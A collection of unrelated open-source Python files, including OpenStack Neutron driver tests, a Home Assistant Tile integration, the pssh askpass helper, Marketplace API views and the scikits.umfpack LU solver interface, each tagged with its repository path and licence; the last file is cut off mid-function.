# Copyright (c) 2013-2014 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# @author: Kyle Mestery, Cisco Systems, Inc.
import mock
import requests
from neutron.plugins.common import constants
from neutron.plugins.ml2 import config as config
from neutron.plugins.ml2 import driver_api as api
from neutron.plugins.ml2.drivers import mechanism_odl
from neutron.plugins.ml2 import plugin
from neutron.tests import base
from neutron.tests.unit import test_db_plugin as test_plugin
from neutron.tests.unit import testlib_api
PLUGIN_NAME = 'neutron.plugins.ml2.plugin.Ml2Plugin'
class OpenDaylightTestCase(test_plugin.NeutronDbPluginV2TestCase):
def setUp(self):
# Enable the test mechanism driver to ensure that
# we can successfully call through to all mechanism
# driver apis.
config.cfg.CONF.set_override('mechanism_drivers',
['logger', 'opendaylight'],
'ml2')
# Set URL/user/pass so init doesn't throw a cfg required error.
# They are not used in these tests since sendjson is overwritten.
config.cfg.CONF.set_override('url', 'http://127.0.0.1:9999', 'ml2_odl')
config.cfg.CONF.set_override('username', 'someuser', 'ml2_odl')
config.cfg.CONF.set_override('password', 'somepass', 'ml2_odl')
super(OpenDaylightTestCase, self).setUp(PLUGIN_NAME)
self.port_create_status = 'DOWN'
self.segment = {'api.NETWORK_TYPE': ""}
self.mech = mechanism_odl.OpenDaylightMechanismDriver()
mechanism_odl.OpenDaylightMechanismDriver.sendjson = (
self.check_sendjson)
def check_sendjson(self, method, urlpath, obj, ignorecodes=[]):
self.assertFalse(urlpath.startswith("http://"))
def test_check_segment(self):
"""Validate the check_segment call."""
self.segment[api.NETWORK_TYPE] = constants.TYPE_LOCAL
self.assertTrue(self.mech.check_segment(self.segment))
self.segment[api.NETWORK_TYPE] = constants.TYPE_FLAT
self.assertFalse(self.mech.check_segment(self.segment))
self.segment[api.NETWORK_TYPE] = constants.TYPE_VLAN
self.assertTrue(self.mech.check_segment(self.segment))
self.segment[api.NETWORK_TYPE] = constants.TYPE_GRE
self.assertTrue(self.mech.check_segment(self.segment))
self.segment[api.NETWORK_TYPE] = constants.TYPE_VXLAN
self.assertTrue(self.mech.check_segment(self.segment))
# Validate a network type not currently supported
self.segment[api.NETWORK_TYPE] = 'mpls'
self.assertFalse(self.mech.check_segment(self.segment))
class OpenDayLightMechanismConfigTests(testlib_api.SqlTestCase):
def _set_config(self, url='http://127.0.0.1:9999', username='someuser',
password='somepass'):
config.cfg.CONF.set_override('mechanism_drivers',
['logger', 'opendaylight'],
'ml2')
config.cfg.CONF.set_override('url', url, 'ml2_odl')
config.cfg.CONF.set_override('username', username, 'ml2_odl')
config.cfg.CONF.set_override('password', password, 'ml2_odl')
def _test_missing_config(self, **kwargs):
self._set_config(**kwargs)
self.assertRaises(config.cfg.RequiredOptError,
plugin.Ml2Plugin)
def test_valid_config(self):
self._set_config()
plugin.Ml2Plugin()
def test_missing_url_raises_exception(self):
self._test_missing_config(url=None)
def test_missing_username_raises_exception(self):
self._test_missing_config(username=None)
def test_missing_password_raises_exception(self):
self._test_missing_config(password=None)
class OpenDaylightMechanismTestBasicGet(test_plugin.TestBasicGet,
OpenDaylightTestCase):
pass
class OpenDaylightMechanismTestNetworksV2(test_plugin.TestNetworksV2,
OpenDaylightTestCase):
pass
class OpenDaylightMechanismTestSubnetsV2(test_plugin.TestSubnetsV2,
OpenDaylightTestCase):
pass
class OpenDaylightMechanismTestPortsV2(test_plugin.TestPortsV2,
OpenDaylightTestCase):
pass
class AuthMatcher(object):
def __eq__(self, obj):
return (obj.username == config.cfg.CONF.ml2_odl.username and
obj.password == config.cfg.CONF.ml2_odl.password)
class OpenDaylightMechanismDriverTestCase(base.BaseTestCase):
def setUp(self):
super(OpenDaylightMechanismDriverTestCase, self).setUp()
config.cfg.CONF.set_override('mechanism_drivers',
['logger', 'opendaylight'], 'ml2')
config.cfg.CONF.set_override('url', 'http://127.0.0.1:9999', 'ml2_odl')
config.cfg.CONF.set_override('username', 'someuser', 'ml2_odl')
config.cfg.CONF.set_override('password', 'somepass', 'ml2_odl')
self.mech = mechanism_odl.OpenDaylightMechanismDriver()
self.mech.initialize()
@staticmethod
def _get_mock_delete_resource_context():
current = {'id': '00000000-1111-2222-3333-444444444444'}
context = mock.Mock(current=current)
return context
_status_code_msgs = {
204: '',
401: '401 Client Error: Unauthorized',
403: '403 Client Error: Forbidden',
404: '404 Client Error: Not Found',
409: '409 Client Error: Conflict',
501: '501 Server Error: Not Implemented'
}
@classmethod
def _get_mock_request_response(cls, status_code):
response = mock.Mock(status_code=status_code)
response.raise_for_status = mock.Mock() if status_code < 400 else (
mock.Mock(side_effect=requests.exceptions.HTTPError(
cls._status_code_msgs[status_code])))
return response
def _test_delete_resource_postcommit(self, object_type, status_code,
exc_class=None):
self.mech.out_of_sync = False
method = getattr(self.mech, 'delete_%s_postcommit' % object_type)
context = self._get_mock_delete_resource_context()
request_response = self._get_mock_request_response(status_code)
with mock.patch('requests.request',
return_value=request_response) as mock_method:
if exc_class is not None:
self.assertRaises(exc_class, method, context)
else:
method(context)
url = '%s/%ss/%s' % (config.cfg.CONF.ml2_odl.url, object_type,
context.current['id'])
mock_method.assert_called_once_with(
'delete', url=url, headers={'Content-Type': 'application/json'},
data=None, auth=AuthMatcher(),
timeout=config.cfg.CONF.ml2_odl.timeout)
def test_delete_network_postcommit(self):
self._test_delete_resource_postcommit('network',
requests.codes.no_content)
for status_code in (requests.codes.unauthorized,
requests.codes.not_found,
requests.codes.conflict):
self._test_delete_resource_postcommit(
'network', status_code, requests.exceptions.HTTPError)
def test_delete_subnet_postcommit(self):
self._test_delete_resource_postcommit('subnet',
requests.codes.no_content)
for status_code in (requests.codes.unauthorized,
requests.codes.not_found,
requests.codes.conflict,
requests.codes.not_implemented):
self._test_delete_resource_postcommit(
'subnet', status_code, requests.exceptions.HTTPError)
def test_delete_port_postcommit(self):
self._test_delete_resource_postcommit('port',
requests.codes.no_content)
for status_code in (requests.codes.unauthorized,
requests.codes.forbidden,
requests.codes.not_found,
requests.codes.not_implemented):
self._test_delete_resource_postcommit(
'port', status_code, requests.exceptions.HTTPError)
| shakamunyi/neutron-vrrp | neutron/tests/unit/ml2/test_mechanism_odl.py | Python | apache-2.0 | 9,006 |
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=bare-except,broad-except,unreachable,redefined-outer-name
# Else should run when no exception raised.
x = 0
try:
x = 1
except:
x = 2
else:
x = 3
assert x == 3
# Bare except handles all.
x = 0
try:
x = 1
raise Exception
x = 2
except:
x = 3
assert x == 3
# Correct handler triggered.
x = 0
try:
x = 1
raise Exception
x = 2
except TypeError:
x = 4
except Exception:
x = 3
assert x == 3
# Else should not run when exception raised.
x = 0
try:
x = 1
raise Exception
x = 2
except Exception:
x = 3
else:
x = 4
assert x == 3
# Finally should execute last.
x = 0
try:
x = 1
finally:
x = 2
assert x == 2
# Finally should execute when exception raised.
x = 0
try:
x = 1
raise Exception
x = 2
except:
x = 3
finally:
x = 4
assert x == 4
# Uncaught exception should propagate to the next handler.
x = 0
try:
try:
raise Exception
x = 1
except TypeError:
x = 2
except Exception:
x = 3
assert x == 3
# Exceptions that pass through a finally, should propagate.
x = 0
try:
try:
x = 1
raise Exception
x = 2
finally:
x = 3
except Exception:
pass
assert x == 3
# If a function does not handle an exception it should propagate.
x = 0
def f():
x = 1
raise Exception
try:
f()
x = 2
except Exception:
x = 3
assert x == 3
def foo():
# Else should run when no exception raised.
x = 0
try:
x = 1
except:
x = 2
else:
x = 3
assert x == 3
# Bare except handles all.
x = 0
try:
x = 1
raise Exception
x = 2
except:
x = 3
assert x == 3
# Correct handler triggered.
x = 0
try:
x = 1
raise Exception
x = 2
except TypeError:
x = 4
except Exception:
x = 3
assert x == 3
# Else should not run when exception raised.
x = 0
try:
x = 1
raise Exception
x = 2
except Exception:
x = 3
else:
x = 4
assert x == 3
# Finally should execute last.
x = 0
try:
x = 1
finally:
x = 2
assert x == 2
# Finally should execute when exception raised.
x = 0
try:
x = 1
raise Exception
x = 2
except:
x = 3
finally:
x = 4
assert x == 4
# Uncaught exception should propagate to the next handler.
x = 0
try:
try:
raise Exception
x = 1
except TypeError:
x = 2
except Exception:
x = 3
assert x == 3
# Exceptions that pass through a finally, should propagate.
x = 0
try:
try:
x = 1
raise Exception
x = 2
finally:
x = 3
except Exception:
pass
assert x == 3
# If a function does not handle an exception it should propagate.
x = 0
def f():
x = 1
raise Exception
try:
f()
x = 2
except Exception:
x = 3
assert x == 3
foo()
| AlexEKoren/grumpy | testing/try_test.py | Python | apache-2.0 | 3,365 |
"""The Tile component."""
import asyncio
from datetime import timedelta
from pytile import async_login
from pytile.errors import SessionExpiredError, TileError
from homeassistant.const import ATTR_ATTRIBUTION, CONF_PASSWORD, CONF_USERNAME
from homeassistant.core import callback
from homeassistant.helpers import aiohttp_client
from homeassistant.helpers.update_coordinator import (
CoordinatorEntity,
DataUpdateCoordinator,
UpdateFailed,
)
from .const import DATA_COORDINATOR, DOMAIN, LOGGER
PLATFORMS = ["device_tracker"]
DEVICE_TYPES = ["PHONE", "TILE"]
DEFAULT_ATTRIBUTION = "Data provided by Tile"
DEFAULT_ICON = "mdi:view-grid"
DEFAULT_UPDATE_INTERVAL = timedelta(minutes=2)
CONF_SHOW_INACTIVE = "show_inactive"
async def async_setup(hass, config):
"""Set up the Tile component."""
hass.data[DOMAIN] = {DATA_COORDINATOR: {}}
return True
async def async_setup_entry(hass, config_entry):
"""Set up Tile as config entry."""
websession = aiohttp_client.async_get_clientsession(hass)
client = await async_login(
config_entry.data[CONF_USERNAME],
config_entry.data[CONF_PASSWORD],
session=websession,
)
async def async_update_data():
"""Get new data from the API."""
try:
return await client.tiles.all()
except SessionExpiredError:
LOGGER.info("Tile session expired; creating a new one")
await client.async_init()
except TileError as err:
raise UpdateFailed(f"Error while retrieving data: {err}") from err
coordinator = DataUpdateCoordinator(
hass,
LOGGER,
name=config_entry.title,
update_interval=DEFAULT_UPDATE_INTERVAL,
update_method=async_update_data,
)
await coordinator.async_refresh()
hass.data[DOMAIN][DATA_COORDINATOR][config_entry.entry_id] = coordinator
for component in PLATFORMS:
hass.async_create_task(
hass.config_entries.async_forward_entry_setup(config_entry, component)
)
return True
async def async_unload_entry(hass, config_entry):
"""Unload a Tile config entry."""
unload_ok = all(
await asyncio.gather(
*[
hass.config_entries.async_forward_entry_unload(config_entry, component)
for component in PLATFORMS
]
)
)
if unload_ok:
hass.data[DOMAIN][DATA_COORDINATOR].pop(config_entry.entry_id)
return unload_ok
class TileEntity(CoordinatorEntity):
"""Define a generic Tile entity."""
def __init__(self, coordinator):
"""Initialize."""
super().__init__(coordinator)
self._attrs = {ATTR_ATTRIBUTION: DEFAULT_ATTRIBUTION}
self._name = None
self._unique_id = None
@property
def device_state_attributes(self):
"""Return the device state attributes."""
return self._attrs
@property
def icon(self):
"""Return the icon."""
return DEFAULT_ICON
@property
def name(self):
"""Return the name."""
return self._name
@property
def unique_id(self):
"""Return the unique ID of the entity."""
return self._unique_id
@callback
def _handle_coordinator_update(self):
"""Respond to a DataUpdateCoordinator update."""
self._update_from_latest_data()
self.async_write_ha_state()
@callback
def _update_from_latest_data(self):
"""Update the entity from the latest data."""
raise NotImplementedError
async def async_added_to_hass(self):
"""Handle entity which will be added."""
await super().async_added_to_hass()
self._update_from_latest_data()
| tboyce1/home-assistant | homeassistant/components/tile/__init__.py | Python | apache-2.0 | 3,733 |
# Licensed Materials - Property of IBM
# Copyright IBM Corp. 2016, 2017
class DataAlreadyExistsError(RuntimeError):
def __init__(self, label):
self.message = str("Data with label '%s' already exists and cannot be added" % (label))
def get_patient_id(d):
return d['patient']['identifier']
def get_index_by_label(d, label):
for idx in range(len(d['data'])):
if d['data'][idx]['label'] == label:
return idx
return None
def get_sampled_data_values(d, label):
idx = get_index_by_label(d, label)
return d['data'][idx]['valueSampledData']['values']
def get_coordinate_data_values(d, label):
idx = get_index_by_label(d, label)
return d['data'][idx]['valueCoordinateData']['values']
def get_period_value(d, label):
idx = get_index_by_label(d, label)
return d['data'][idx]['valueSampledData']['period']['value']
def get_sampled_data_unit(d, label):
idx = get_index_by_label(d, label)
return d['data'][idx]['valueSampledData']['unit']
def get_period_unit(d, label):
idx = get_index_by_label(d, label)
return d['data'][idx]['valueSampledData']['period']['unit']
def get_gain(d, label):
idx = get_index_by_label(d, label)
return d['data'][idx]['valueSampledData']['gain']
def get_initValue(d, label):
idx = get_index_by_label(d, label)
return d['data'][idx]['valueSampledData']['initVal']
def get_patient_ID(d):
return d['patient']['identifier']
def add_sampled_data(d, label, sampled_data, period_value, period_unit, update_if_exists=False):
# check if label already exists
data_idx = get_index_by_label(d, label)
if data_idx is not None:
if update_if_exists == True:
v = {'valuesSampledData' : { 'values' : sampled_data, 'period' : { 'value' : period_value, 'unit' : period_unit }}}
d['data'][data_idx] = v
else:
raise DataAlreadyExistsError(label=label)
else:
v = {'label' : label, 'valuesSampledData' : { 'values' : sampled_data, 'period' : { 'value' : period_value, 'unit' : period_unit }}}
d['data'].append(v)
def add_coordinate_data(d, label, coords, replace_if_exists=False):
data_idx = get_index_by_label(d, label)
if data_idx is not None:
if replace_if_exists == True:
v = {'valueCoordinateData' : {'values' : coords}}
d['data'][data_idx] = v
else:
raise DataAlreadyExistsError(label=label)
else:
v = {'label' : label, 'valueCoordinateData' : {'values' : coords}}
d['data'].append(v)
| IBMStreams/streamsx.health | samples/HealthcareJupyterDemo/package/healthdemo/utils.py | Python | apache-2.0 | 2,562 |
from __future__ import print_function, unicode_literals
core_store_students_programs = False
core_store_students_programs_path = 'files_stored'
core_experiment_poll_time = 350 # seconds
# Ports
core_facade_port = 28345
core_facade_server_route = 'provider1-route'
# Will only work in JSON in this config file :-(
core_server_url = 'http://127.0.0.1:%s/weblab/' % core_facade_port
# Scheduling
core_coordinator_db_name = 'WebLabCoordination2'
core_coordinator_db_username = 'weblab'
core_coordinator_db_password = 'weblab'
core_coordinator_laboratory_servers = {
"laboratory:main_instance@provider1_machine" : {
"exp1|dummy1|Dummy experiments" : "dummy1@dummy1_local",
"exp1|dummy3_with_other_name|Dummy experiments" : "dummy3_with_other_name@dummy3_with_other_name",
}
}
core_coordinator_external_servers = {
'dummy1@Dummy experiments' : [ 'dummy1_external' ],
'dummy4@Dummy experiments' : [ 'dummy4' ],
}
_provider2_scheduling_config = ("EXTERNAL_WEBLAB_DEUSTO", {
'baseurl' : 'http://127.0.0.1:38345/weblab/',
'username' : 'provider1',
'password' : 'password',
})
core_scheduling_systems = {
"dummy1_local" : ("PRIORITY_QUEUE", {}),
"dummy3_with_other_name" : ("PRIORITY_QUEUE", {}),
"dummy4" : _provider2_scheduling_config,
"dummy1_external" : _provider2_scheduling_config,
}
core_weblabdeusto_federation_retrieval_period = 0.1
| morelab/weblabdeusto | server/src/test/deployments/federated_basic_sql/provider1/core_config.py | Python | bsd-2-clause | 1,626 |
#!/usr/bin/env python
# -*- Mode: python -*-
# Copyright (c) 2009, Andrew McNabb
"""Implementation of SSH_ASKPASS to get a password to ssh from pssh.
The password is read from the socket specified by the environment variable
PSSH_ASKPASS_SOCKET. The other end of this socket is pssh.
The ssh man page discusses SSH_ASKPASS as follows:
If ssh needs a passphrase, it will read the passphrase from the current
terminal if it was run from a terminal. If ssh does not have a terminal
associated with it but DISPLAY and SSH_ASKPASS are set, it will execute
the program specified by SSH_ASKPASS and open an X11 window to read the
passphrase. This is particularly useful when calling ssh from a .xsession
or related script. (Note that on some machines it may be necessary to
redirect the input from /dev/null to make this work.)
"""
import os
import socket
import sys
import textwrap
bin_dir = os.path.dirname(os.path.abspath(sys.argv[0]))
askpass_bin_path = os.path.join(bin_dir, 'pssh-askpass')
ASKPASS_PATHS = (askpass_bin_path,
'/usr/libexec/pssh/pssh-askpass',
'/usr/local/libexec/pssh/pssh-askpass',
'/usr/lib/pssh/pssh-askpass',
'/usr/local/lib/pssh/pssh-askpass')
_executable_path = None
def executable_path():
"""Determines the value to use for SSH_ASKPASS.
The value is cached since this may be called many times.
"""
global _executable_path
if _executable_path is None:
for path in ASKPASS_PATHS:
if os.access(path, os.X_OK):
_executable_path = path
break
else:
_executable_path = ''
sys.stderr.write(textwrap.fill("Warning: could not find an"
" executable path for askpass because PSSH was not"
" installed correctly. Password prompts will not work."))
sys.stderr.write('\n')
return _executable_path
def askpass_main():
"""Connects to pssh over the socket specified at PSSH_ASKPASS_SOCKET."""
verbose = os.getenv('PSSH_ASKPASS_VERBOSE')
# It's not documented anywhere, as far as I can tell, but ssh may prompt
# for a password or ask a yes/no question. The command-line argument
# specifies what is needed.
if len(sys.argv) > 1:
prompt = sys.argv[1]
if verbose:
sys.stderr.write('pssh-askpass received prompt: "%s"\n' % prompt)
if not prompt.strip().lower().endswith('password:'):
sys.stderr.write(prompt)
sys.stderr.write('\n')
sys.exit(1)
else:
sys.stderr.write('Error: pssh-askpass called without a prompt.\n')
sys.exit(1)
address = os.getenv('PSSH_ASKPASS_SOCKET')
if not address:
sys.stderr.write(textwrap.fill("pssh error: SSH requested a password."
" Please create SSH keys or use the -A option to provide a"
" password."))
sys.stderr.write('\n')
sys.exit(1)
sock = socket.socket(socket.AF_UNIX)
try:
sock.connect(address)
except socket.error:
_, e, _ = sys.exc_info()
message = e.args[1]
sys.stderr.write("Couldn't bind to %s: %s.\n" % (address, message))
sys.exit(2)
try:
password = sock.makefile().read()
except socket.error:
sys.stderr.write("Socket error.\n")
sys.exit(3)
print(password)
if __name__ == '__main__':
askpass_main()
| jorik041/parallel-ssh | psshlib/askpass_client.py | Python | bsd-3-clause | 3,462 |
from __future__ import division
import numpy as np
from numpy.testing import assert_almost_equal
import pytest
from acoustics.power import lw_iso3746
@pytest.mark.parametrize("background_noise, expected", [
(79, 91.153934187),
(83, 90.187405234),
(88, 88.153934187),
])
def test_lw_iso3746(background_noise, expected):
LpAi = np.array([90, 90, 90, 90])
LpAiB = background_noise * np.ones(4)
S = 10
alpha = np.array([0.1, 0.1, 0.1, 0.1, 0.1, 0.1])
surfaces = np.array([10, 10, 10, 10, 10, 10])
calculated = lw_iso3746(LpAi, LpAiB, S, alpha, surfaces)
assert_almost_equal(calculated, expected)
| FRidh/python-acoustics | tests/test_power.py | Python | bsd-3-clause | 637 |
from django import forms as django_forms
from django.core.urlresolvers import reverse
from django.http import Http404
import commonware
import waffle
from rest_framework import exceptions, response, serializers, status, viewsets
from rest_framework.decorators import detail_route
from rest_framework.response import Response
from lib.metrics import record_action
from mkt.api.authentication import (RestAnonymousAuthentication,
RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.api.base import CORSMixin, MarketplaceView, SlugOrIdMixin
from mkt.api.exceptions import HttpLegallyUnavailable
from mkt.api.forms import IconJSONForm
from mkt.api.permissions import (AllowAppOwner, AllowReadOnlyIfPublic,
AllowReviewerReadOnly, AnyOf)
from mkt.developers import tasks
from mkt.developers.forms import (AppFormMedia, IARCGetAppInfoForm,
IARCV2ExistingCertificateForm)
from mkt.files.models import FileUpload
from mkt.regions import get_region
from mkt.submit.views import PreviewViewSet
from mkt.webapps.models import AddonUser, get_excluded_in, Webapp
from mkt.webapps.serializers import AppSerializer
log = commonware.log.getLogger('z.api')
class AppViewSet(CORSMixin, SlugOrIdMixin, MarketplaceView,
viewsets.ModelViewSet):
serializer_class = AppSerializer
slug_field = 'app_slug'
cors_allowed_methods = ('get', 'put', 'post', 'delete')
permission_classes = [AnyOf(AllowAppOwner, AllowReviewerReadOnly,
AllowReadOnlyIfPublic)]
authentication_classes = [RestOAuthAuthentication,
RestSharedSecretAuthentication,
RestAnonymousAuthentication]
def get_queryset(self):
return Webapp.objects.all().exclude(
id__in=get_excluded_in(get_region().id))
def get_base_queryset(self):
return Webapp.objects.all()
def get_object(self):
try:
app = super(AppViewSet, self).get_object()
except Http404:
self.get_queryset = self.get_base_queryset
app = super(AppViewSet, self).get_object()
# Owners and reviewers can see apps regardless of region.
owner_or_reviewer = AnyOf(AllowAppOwner, AllowReviewerReadOnly)
if owner_or_reviewer.has_object_permission(self.request, self,
app):
return app
data = {}
for key in ('name', 'support_email', 'support_url'):
value = getattr(app, key)
data[key] = unicode(value) if value else ''
data['reason'] = 'Not available in your region.'
raise HttpLegallyUnavailable(data)
self.check_object_permissions(self.request, app)
return app
def create(self, request, *args, **kwargs):
uuid = request.data.get('upload', '')
if uuid:
is_packaged = True
else:
uuid = request.data.get('manifest', '')
is_packaged = False
if not uuid:
raise exceptions.ParseError(
'No upload or manifest specified.')
try:
upload = FileUpload.objects.get(uuid=uuid)
except FileUpload.DoesNotExist:
raise exceptions.ParseError('No upload found.')
if not upload.valid:
raise exceptions.ParseError('Upload not valid.')
if not request.user.read_dev_agreement:
log.info(u'Attempt to use API without dev agreement: %s'
% request.user.pk)
raise exceptions.PermissionDenied('Terms of Service not accepted.')
if not (upload.user and upload.user.pk == request.user.pk):
raise exceptions.PermissionDenied('You do not own that app.')
# Create app, user and fetch the icon.
try:
obj = Webapp.from_upload(upload, is_packaged=is_packaged)
except (serializers.ValidationError,
django_forms.ValidationError) as e:
raise exceptions.ParseError(unicode(e))
AddonUser(addon=obj, user=request.user).save()
tasks.fetch_icon.delay(obj.pk, obj.latest_version.all_files[0].pk)
record_action('app-submitted', request, {'app-id': obj.pk})
log.info('App created: %s' % obj.pk)
data = AppSerializer(
context=self.get_serializer_context(), instance=obj).data
return response.Response(
data, status=201,
headers={'Location': reverse('app-detail', kwargs={'pk': obj.pk})})
def update(self, request, *args, **kwargs):
# Fail if the app doesn't exist yet.
self.get_object()
r = super(AppViewSet, self).update(request, *args, **kwargs)
# Be compatible with tastypie responses.
if r.status_code == 200:
r.status_code = 202
return r
def list(self, request, *args, **kwargs):
if not request.user.is_authenticated():
log.info('Anonymous listing not allowed')
raise exceptions.PermissionDenied('Anonymous listing not allowed.')
self.object_list = self.filter_queryset(self.get_queryset().filter(
authors=request.user))
page = self.paginate_queryset(self.object_list)
serializer = self.get_serializer(page, many=True)
return self.get_paginated_response(serializer.data)
def partial_update(self, request, *args, **kwargs):
raise exceptions.MethodNotAllowed('PATCH')
@detail_route(methods=['POST'])
def content_ratings(self, request, *args, **kwargs):
app = self.get_object()
if waffle.switch_is_active('iarc-upgrade-v2'):
form = IARCV2ExistingCertificateForm(data=request.data, app=app)
else:
form = IARCGetAppInfoForm(data=request.data, app=app)
if form.is_valid():
try:
form.save(app)
return Response(status=status.HTTP_201_CREATED)
except django_forms.ValidationError:
pass
return Response(form.errors, status=status.HTTP_400_BAD_REQUEST)
@detail_route(
methods=['POST'],
cors_allowed_methods=PreviewViewSet.cors_allowed_methods)
def preview(self, request, *args, **kwargs):
kwargs['app'] = self.get_object()
view = PreviewViewSet.as_view({'post': '_create'})
return view(request, *args, **kwargs)
@detail_route(methods=['PUT'], cors_allowed_methods=['put'])
def icon(self, request, *args, **kwargs):
app = self.get_object()
data_form = IconJSONForm(request.data)
if not data_form.is_valid():
return Response(data_form.errors,
status=status.HTTP_400_BAD_REQUEST)
form = AppFormMedia(data_form.cleaned_data, request=request)
if not form.is_valid():
return Response(data_form.errors,
status=status.HTTP_400_BAD_REQUEST)
form.save(app)
return Response(status=status.HTTP_200_OK)
class PrivacyPolicyViewSet(CORSMixin, SlugOrIdMixin, MarketplaceView,
viewsets.GenericViewSet):
queryset = Webapp.objects.all()
cors_allowed_methods = ('get',)
permission_classes = [AnyOf(AllowAppOwner, AllowReviewerReadOnly,
AllowReadOnlyIfPublic)]
slug_field = 'app_slug'
authentication_classes = [RestOAuthAuthentication,
RestSharedSecretAuthentication,
RestAnonymousAuthentication]
def retrieve(self, request, *args, **kwargs):
app = self.get_object()
return response.Response(
{'privacy_policy': unicode(app.privacy_policy)},
content_type='application/json')
| ingenioustechie/zamboni | mkt/webapps/views.py | Python | bsd-3-clause | 7,946 |
"""
Easy-to-use UMFPACK interface
=============================
.. currentmodule:: scikits.umfpack
The following functions can be used for LU decompositions and solving
equation systems:
.. autosummary::
:toctree: reference/
spsolve
splu
UmfpackLU
"""
from __future__ import division, print_function, absolute_import
from warnings import warn
import sys
import numpy as np
from numpy import asarray
from scipy.sparse import (isspmatrix_csc, isspmatrix_csr, isspmatrix,
SparseEfficiencyWarning, csc_matrix, hstack)
from .umfpack import UmfpackContext, UMFPACK_A
_families = {
(np.float64, np.int32): 'di',
(np.complex128, np.int32): 'zi',
(np.float64, np.int64): 'dl',
(np.complex128, np.int64): 'zl'
}
__all__ = ['spsolve', 'splu', 'UmfpackLU']
if sys.version_info[0] >= 3:
xrange = range
def spsolve(A, b):
"""Solve the sparse linear system Ax=b, where b may be a vector or a matrix.
Parameters
----------
A : ndarray or sparse matrix
The square matrix A will be converted into CSC or CSR form
b : ndarray or sparse matrix
The matrix or vector representing the right hand side of the equation.
Returns
-------
x : ndarray or sparse matrix
the solution of the sparse linear equation.
If b is a vector, then x is a vector of size A.shape[0]
If b is a matrix, then x is a matrix of size (A.shape[0],)+b.shape[1:]
"""
x = UmfpackLU(A).solve(b)
if b.ndim == 2 and b.shape[1] == 1:
# compatibility with scipy.sparse.spsolve quirk
return x.ravel()
else:
return x
def splu(A):
"""
Compute the LU decomposition of a sparse, square matrix.
Parameters
----------
A : sparse matrix
Sparse matrix to factorize. Should be in CSR or CSC format.
Returns
-------
invA : scikits.umfpack.UmfpackLU
Object, which has a ``solve`` method.
Notes
-----
This function uses the UMFPACK library.
"""
return UmfpackLU(A)
class UmfpackLU(object):
"""
LU factorization of a sparse matrix.
Factorization is represented as::
Pr * (R^-1) * A * Pc = L * U
Parameters
----------
A : csc_matrix or csr_matrix
Matrix to decompose
Attributes
----------
shape
nnz
perm_c
perm_r
L
U
R
Methods
-------
solve
solve_sparse
Examples
--------
The LU decomposition can be used to solve matrix equations. Consider:
>>> import numpy as np
>>> from scipy.sparse import csc_matrix
>>> from scikits import umfpack
>>> A = csc_matrix([[1,2,0,4],[1,0,0,1],[1,0,2,1],[2,2,1,0.]])
This can be solved for a given right-hand side:
>>> lu = umfpack.splu(A)
>>> b = np.array([1, 2, 3, 4])
>>> x = lu.solve(b)
>>> A.dot(x)
array([ 1., 2., 3., 4.])
The ``lu`` object also contains an explicit representation of the
decomposition. The permutations are represented as mappings of
indices:
>>> lu.perm_r
array([0, 2, 1, 3], dtype=int32)
>>> lu.perm_c
array([2, 0, 1, 3], dtype=int32)
The L and U factors are sparse matrices in CSC format:
>>> lu.L.A
array([[ 1. , 0. , 0. , 0. ],
[ 0. , 1. , 0. , 0. ],
[ 0. , 0. , 1. , 0. ],
[ 1. , 0.5, 0.5, 1. ]])
>>> lu.U.A
array([[ 2., 0., 1., 4.],
[ 0., 2., 1., 1.],
[ 0., 0., 1., 1.],
[ 0., 0., 0., -5.]])
The permutation matrices can be constructed:
>>> Pr = csc_matrix((4, 4))
>>> Pr[lu.perm_r, np.arange(4)] = 1
>>> Pc = csc_matrix((4, 4))
>>> Pc[np.arange(4), lu.perm_c] = 1
Similarly for the row scalings:
>>> R = csc_matrix((4, 4))
>>> R.setdiag(lu.R)
We can reassemble the original matrix:
>>> (Pr.T * R * (lu.L * lu.U) * Pc.T).A
array([[ 1., 2., 0., 4.],
[ 1., 0., 0., 1.],
[ 1., 0., 2., 1.],
[ 2., 2., 1., 0.]])
"""
def __init__(self, A):
if not (isspmatrix_csc(A) or isspmatrix_csr(A)):
A = csc_matrix(A)
warn('spsolve requires A be CSC or CSR matrix format',
SparseEfficiencyWarning)
A.sort_indices()
A = A.asfptype() # upcast to a floating point format
M, N = A.shape
if (M != N):
raise ValueError("matrix must be square (has shape %s)" % ((M, N),))
f_type = np.sctypeDict[A.dtype.name]
i_type = np.sctypeDict[A.indices.dtype.name]
try:
family = _families[(f_type, i_type)]
except KeyError:
msg = 'only float64 or complex128 matrices with int32 or int64' \
' indices are supported! (got: matrix: %s, indices: %s)' \
% (f_type, i_type)
raise ValueError(msg)
self.umf = UmfpackContext(family)
self.umf.numeric(A)
self._A = A
self._L = None
self._U = None
self._P = None
self._Q = None
self._R = None
def solve(self, b):
"""
Solve linear equation A x = b for x
Parameters
----------
b : ndarray
Right-hand side of the matrix equation. Can be vector or a matrix.
Returns
-------
x : ndarray
Solution to the matrix equation
"""
if isspmatrix(b):
b = b.toarray()
if b.shape[0] != self._A.shape[1]:
raise ValueError("Shape of b is not compatible with that of A")
b_arr = asarray(b, dtype=self._A.dtype).reshape(b.shape[0], -1)
x = np.zeros((self._A.shape[0], b_arr.shape[1]), dtype=self._A.dtype)
for j in range(b_arr.shape[1]):
x[:,j] = self.umf.solve(UMFPACK_A, self._A, b_arr[:,j], autoTranspose=True)
return x.reshape((self._A.shape[0],) + b.shape[1:])
def solve_sparse(self, B):
"""
Solve linear equation of the form A X = B. Where B and X are sparse matrices.
Parameters
----------
B : any scipy.sparse matrix
Right-hand side of the matrix equation.
Note: it will be converted to csc_matrix via `.tocsc()`.
Returns
-------
X : csc_matrix
Solution to the matrix equation as a csc_matrix
"""
B = B.tocsc()
cols = list()
for j in xrange(B.shape[1]):
col = self.solve(B[:,j])
